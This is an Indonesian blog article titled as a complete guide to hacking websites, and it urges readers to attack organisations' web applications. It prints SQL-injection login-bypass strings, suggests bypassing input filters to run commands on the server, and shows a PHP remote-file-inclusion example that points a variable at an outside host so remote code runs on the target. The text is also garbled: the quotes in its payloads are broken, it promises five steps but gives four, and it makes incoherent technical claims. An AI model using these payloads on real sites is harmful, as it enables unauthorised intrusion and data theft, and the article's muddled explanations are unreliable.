Panduan Lengkap Hacking Website

Written by

Apakah anda pernah bertanya-tanya tentang bagaimana cara hacker berhasil mencuri data atau merusak server dari situs milik beberapa organisasi terbesar di dunia? Jika ya , maka anda sudah berada di artikel yang tepat . Berkat alat online yang tersedia secara bebas di luar , maka kami akan menunjukkan betapa mudahnya untuk melakukan teknik hacking dalam lima langkah di bawah ini.

Sampai saat ini , banyak orang memiliki akses ke internet yang telah mendorong banyak organisasi untuk mengembangkan aplikasi berbasis web , dan hal ini memang sangat memudahkan pengguna untuk berinteraksi dengan organisasi tersebut . Namun , jika para hacker dapat menulis beberapa kode buruk di aplikasi web , yang selanjutnya dapat dimanfaatkan untuk mengakses data sensitif dan web server dari sebuah organisasi , maka mengapa anda tidak dapat melakukannya ?

Dalam artikel ini, kami akan memperkenalkan kepada anda sebuah teknik hacking web yang dapat anda coba , dan itu sepenuhnya bekerja . Berikut merupakan beberapa teknik yang perlu anda pelajari :

A . Teknik Pengintaian

hacker

Ini merupakan teknik dasar yang perlu anda pelajari , dan hal ini akan melibatkan pengintaian tentang target yang Anda inginkan . Dan untuk anda yang akrab dengan pengembangan perangkat lunak , akan lebih mudah untuk memahami apa yang saya maksud . Dalam kasus ini , anda tidak dapat mengembangkan perangkat lunak yang baik tanpa memahami dokumentasi yang baik seperti UML , yang artinya kita akan memerlukan informasi tentang target untuk memudahkan pekerjaan hacking .

B . Menulis Script

hacking-script

Dalam kasus ini , anda perlu untuk mencari script yang dapat mengambil informasi pengguna melalui pemindaian input, daftar direktori, memeriksa kode sumber, atau mengetahui bagaimana sebuah website bereaksi terhadap input abnormal . Dan untuk melakukannya , maka anda dapat mengetikkan :

ADMIN’ OR 1 = 1 #

Disamping itu , ketika login menjadi normal , maka anda dapat mencoba teknik injeksi SQL seperti :

‘OR ‘ 1’ = ‘1’–
‘OR ‘ 1’ = ‘1’ ({}
‘OR ‘ 1’ = ‘1’ / *

Akan tetapi teknik tersebut masih belum berakhir , dalam kasus ini , anda dapat mencoba untuk menulis pernyataan SQL pada input, kemudian anda perlu menjalankan perintah tersebut berdasarkan server OS, serta mencari tahu bagaimana situs web mem-filter input dan mencoba untuk mem-bypass filter.

C . Mengganti Source Code / Kode Sumber

c-source-specimen

Saya yakin saat ini , anda sudah mengetahui cara melihat kode sumber halaman web dengan menggunakan klik kanan . Dan hanya untuk mengingatkan kepada anda , bahwa bahasa pemrograman seperti PHP, Perl, ASP, Python dan seterusnya dapat dijalankan pada server , yang berarti anda tidak dapat melihat isi kode sumber dengan klik kanan , kecuali dengan platform open source dimana anda bisa mendapatkan salinan dan mengubah seluruh kode.

D . Inklusi Remote File

Inklusi remote file adalah jenis kerentanan yang paling sering ditemukan di situs web. Hal ini memungkinkan penyerang untuk menyertakan file, dan biasanya akan melalui sebuah skrip yang dibuat di web server. Kerentanan dapat terjadi karena penggunaan input yang diberikan pengguna , tidak memiliki validasi yang tepat . Dan berikut di bawah ini terdapat kode PHP yang dapat membuka sebuah file.

if (!($hfile = fopen(“$file”, “r”))
echo(“error cant open the file: $file
\n”);
?>

Namun , perjalanan anda masih belum berakhir sampai di sini , script diatas hanya merupakan teknik hacking yang dapat membuka file dengan nama yang sudah ditentukan dalam input pengguna . Dan jika anda mengetik allowurlfopen ON , maka script tersebut juga dapat me-remote file.

Contoh:

<? php include($dir. “/ members.php”); ?>

Dalam kasus ini , jika anda ingin membuat file members.php pada web server , maka anda dapat mengetikkan script seperti contoh dibawah ini :

DIR = http://www.server.com/

Script ini akan mengeksekusi file pada target server. Dan yang terpenting dari teknik hacking ini adalah bahwa anda harus mengetikkan script seperti PHP off , jika anda lupa untuk mengetikkannya , maka kode tersebut akan dieksekusi pada server anda sendiri .

Demikianlah beberapa teknik yang dapat kami paparkan untuk meng-hack sebuah website . Dan kami berharap , artikel ini dapat bermanfaat bagi setiap orang yang ingin mempelajari teknik hacking . Atas perhatian dari semua pembaca , maka saya mengucapkan terima kasih . Enjoy your life , guys !

Article Categories:
tekno

Comments are closed.

WP2Social Auto Publish Powered By : XYZScripts.com